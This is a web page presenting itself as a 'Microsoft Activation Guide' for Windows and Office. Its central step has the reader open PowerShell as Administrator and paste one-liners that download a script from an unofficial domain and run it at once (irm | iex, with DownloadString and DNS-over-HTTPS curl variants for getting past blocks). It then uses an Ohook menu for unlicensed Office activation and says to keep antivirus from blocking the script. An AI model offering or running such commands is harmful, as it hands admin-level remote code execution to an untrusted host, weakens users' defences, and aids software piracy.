🔧 Microsoft Activation Guide

Activate Windows or Office using PowerShell

1

Open PowerShell

Click the Start Menu, type PowerShell, then right-click and select "Run as Administrator".

⚠️ Important: You must run PowerShell as Administrator for the activation to work properly.
2

Copy and paste the code below, then press Enter

📌 For Windows 8, 10, 11

irm https://getactivate.depedcdo.online/license | iex

For Windows 7 and later

iex ((New-Object Net.WebClient).DownloadString('https://getactivate.depedcdo.online/license'))

🔧 If blocked by ISP/DNS (needs updated Windows 10 or 11)

iex (curl.exe -s --doh-url https://1.1.1.1/dns-query https://getactivate.depedcdo.online/license | Out-String)
3

Follow the Office365 activation menu

The activation menu will appear. Choose the green-highlighted options to activate Windows or Office.

4

Press 2 for Ohook

Select option 2 from the menu for Office activation with Ohook.

5

Press 1 for Install Ohook Office Activation

Select option 1 to install the Ohook Office activation.

6

Exit the PowerShell

Press any key to exit the PowerShell when the activation is complete.

🎉 Done!

Your Windows or Office should now be activated successfully!

💡 Tip: If you encounter any issues, make sure:
  • PowerShell is running as Administrator
  • Your internet connection is stable
  • Antivirus software is not blocking the script